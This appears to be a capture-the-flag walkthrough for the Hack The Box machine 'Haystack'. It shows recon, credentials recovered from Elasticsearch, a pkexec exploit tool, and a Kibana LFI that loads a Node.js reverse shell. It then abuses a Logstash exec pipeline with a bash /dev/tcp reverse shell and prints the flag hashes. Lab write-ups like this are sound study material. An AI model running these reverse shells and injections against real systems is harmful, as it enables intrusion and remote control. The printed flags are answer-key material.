[Meachines] [Easy] Haystack Elasticsearch cat API+TRP00F权限提升+Kibana LFI+Logstash权限提升

Information Gathering

IP Address	Opening Ports
10.10.10.115	TCP:22,80,9200

$ ip='10.10.10.115'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a8de2928b14b63fe42f3a4743238b2b (RSA)
|   256 e75a3a978e8e728769a30dd100bc1f09 (ECDSA)
|_  256 01d259b2660a9749205f1c84eb81ed95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.12.2
9200/tcp open  http    nginx 1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).
| http-methods: 
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2

Elasticsearch cat API

https://www.elastic.co/guide/en/elasticsearch/reference/6.4/cat.html

https://www.elastic.co/guide/en/elasticsearch/reference/6.4/search.html

http://10.10.10.115:9200/

1.查询集群中的索引模板

$ curl http://10.10.10.115:9200/_cat/

2.查询 Elasticsearch 集群中的所有索引

$ curl http://10.10.10.115:9200/_cat/indices

3.从 Elasticsearch 获取 253 条 quote，提取其文本，并保存到 /tmp/quotes 文件中。

$ curl -s 'http://10.10.10.115:9200/quotes/_search?size=253' | jq '.hits.hits | .[] |._source.quote' > /tmp/quotes

Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg
Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk=

username:security
password:spanish.is.key

User.txt

1091e84b2be43c7954961bbcca7d2f8c

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.33 --lport 10000 --rhost 10.10.16.33 --rport 10032 --http 9999

[!] Do you want to exploit the vulnerability in file ‘pkexec’ ? (y/n) >y

Privilege Escalation:Kibana 6.4.2 LFI && Logstash

Kibana 是一个 数据可视化和分析工具，用于 Elasticsearch 数据库，主要用于日志分析、监控和安全事件调查。它是 Elastic Stack（ELK Stack） 的一部分。

$ ssh -L 5601:127.0.0.1:5601 security@10.10.10.115

https://github.com/mpgn/CVE-2018-17246

靶机中创建/dev/shm/shell.js

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(443, "10.10.16.33", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

$ curl 'http://127.0.0.1:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../dev/shm/shell.js'

filter {
	if [type] == "execute" {
		grok {
			match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
		}
	}
}

input {
	file {
		path => "/opt/kibana/logstash_*"
		start_position => "beginning"
		sincedb_path => "/dev/null"
		stat_interval => "10 second"
		type => "execute"
		mode => "read"
	}
}

会获取从路径/opt/kibana/任何以logstash_开头的文件

output {
	if [type] == "execute" {
		stdout { codec => json }
		exec {
			command => "%{comando} &"
		}
	}
}

需要创建一个以logstash_开头的文件

$ echo 'Ejecutar comando : bash -i >& /dev/tcp/10.10.16.33/10033 0>&1'>/opt/kibana/logstash_rev

Root.txt

e61a148a34817a121876b7721db6445a